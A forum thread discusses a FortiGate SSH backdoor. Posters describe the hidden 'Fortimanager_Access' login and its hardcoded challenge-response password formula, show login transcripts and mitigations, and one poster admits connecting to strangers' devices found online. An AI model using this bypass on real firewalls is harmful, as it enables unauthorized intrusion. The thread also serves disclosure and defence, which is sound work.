Fortinet Forum
The Forums are a place to find answers on a range of Fortinet products from peers and product experts.
New Contributor

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7


I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.


New Contributor

is there any comments from Fortinet Technical team on it. very keen to know


the guy here in twitters confirms that he has the backdoor working





I have tried the script out there and have not been able to get it to work.  Until we get some answer from Fortinet I'm going to keep at it.

Network Engineer

Tried it on a 5.0.7 version and it works.

The script logs in without any password prompt

Valued Contributor

Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs automatically...


~/Desktop $ ./ FortiGate-VM64 # get sys status Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6) Virus-DB: 16.00560(2012-10-19 08:31) Extended DB: 1.00000(2012-10-17 15:46) IPS-DB: 4.00345(2013-05-23 00:39) IPS-ETDB: 0.00000(2001-01-01 00:00) Serial-Number: FGVMEV0000000000

Valued Contributor

I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...


I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).


Thanks for sharing Mike.


I've got mixed result. This one works:

Version: FortiGate-VM64 v5.0,build0128,121101 (GA)


But I was unable to access my FG-111C:

Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)


Don't know.. maybe it's because I did a downgrade from 5.2. Or they have different salts.


For those who don't want to dig too deep into this.


This is all the magic:


If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.

Then you can calculate the dynamic password based on this dword challenge:


n = $SSH_Challenge
m = $SHA1_Generator


m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())




login as: Fortimanager_Access


Using keyboard-interactive authentication. -840056459


Access denied


Using keyboard-interactive authentication. -1914958026


Access denied


Using keyboard-interactive authentication. -1378285763




FortiGate-VM64 #



This only works, if you have a SSH access. So by limiting the ip ranges for all admin users, you can mitigate the threat.

Esteemed Contributor III

If you enable a ssh key it seems like it results in a fix . Can anybody confirm this on there FGT? ( upload a ssh key  from the CLI and retest )






Like this?


login as: admin Authenticating with public key "rsa-key-20160113"

FortiGate-VM64 # conf sys admin

FortiGate-VM64 (admin) # show

config system admin

  edit "admin"

     set accprofile "super_admin"

     set vdom "root"

     set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps                                                                                                           9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"

     config dashboard-tabs



     config dashboard



     set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=



FortiGate-VM64 (admin) #


Still able to access with the FortiManager user.